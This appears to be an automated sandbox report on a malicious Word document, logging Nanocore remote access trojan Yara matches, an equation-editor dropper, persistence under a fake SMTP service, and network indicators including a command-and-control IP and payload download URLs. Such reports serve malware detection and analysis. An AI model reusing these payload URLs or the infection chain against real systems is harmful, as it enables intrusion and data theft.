Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_007B2E3E WSARecv,

6_2_007B2E3E

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F90-30CA-4646-ACFF-79FC9E14ADCB}.tmp

Jump to behavior

Source: global traffic

Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegAsm.exe, 00000006.00000002.2371916923.000000000083D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	String found in binary or memory: https://ibkebw.dm.files.1drv.com/
Source: RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmp	String found in binary or memory: https://ibkebw.dm.files.1drv.com/y
Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmp	String found in binary or memory: https://ibkebw.dm.files.1drv.com/y4mkt1ePYl5p-A97ciot0bQ59hcBfLkczVR077g5LVTnsSoRxe1bs39ErOjDRD_qmHQ
Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/E
Source: RegAsm.exe, RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=802AC8A73EEC8C8E&resid=802AC8A73EEC8C8E%21110&authkey=AK1w6-P
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 2ZKf4aq[1].htm.2.dr	String found in binary or memory: https://u.teknik.io/wREzo.txt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: RegAsm.exe, 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
Source: Yara match	File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt			Jump to dropped file

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00287311 NtProtectVirtualMemory,	6_2_00287311
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_0028725D NtProtectVirtualMemory,	6_2_0028725D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_002872B9 NtProtectVirtualMemory,	6_2_002872B9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00287322 NtProtectVirtualMemory,	6_2_00287322
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007B180A NtQuerySystemInformation,	6_2_007B180A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007B17CF NtQuerySystemInformation,	6_2_007B17CF

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00792418	6_2_00792418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00799C03	6_2_00799C03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00798CF0	6_2_00798CF0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007998F0	6_2_007998F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007938C8	6_2_007938C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_0079B5C0	6_2_0079B5C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00793020	6_2_00793020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007930E7	6_2_007930E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007999B7	6_2_007999B7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1E370FF6	6_2_1E370FF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_006B01B7	15_2_006B01B7
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 17_2_003A01B7	17_2_003A01B7
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 20_2_002701B7	20_2_002701B7

Source: filename1.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: filename1.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: filename1.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@19/25@6/3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007B149A AdjustTokenPrivileges,		6_2_007B149A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007B1463 AdjustTokenPrivileges,		6_2_007B1463

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$OTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{92421eeb-c456-44c2-ab8d-5a66d7e5ab97}

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB2DA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................0.......................(.P.....................@.......8.................................................................).....			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................`."...............".....(.P.............<.......................................................................................			Jump to behavior

Source: C:\Users\Public\69577.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\user\subfolder1\filename1.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
